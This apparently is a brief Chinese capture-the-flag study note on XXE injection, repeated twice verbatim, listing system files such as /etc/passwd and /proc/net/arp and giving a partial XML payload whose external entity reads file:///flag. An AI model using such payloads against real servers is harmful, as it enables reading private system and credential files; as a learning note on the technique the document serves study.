总结一下知识点:
抓包,插入恶意XML外部实体
/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包
直接用下面的代码读取flag会报错
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///flag">
]
总结一下知识点:
抓包,插入恶意XML外部实体
/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包
直接用下面的代码读取flag会报错
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///flag">
]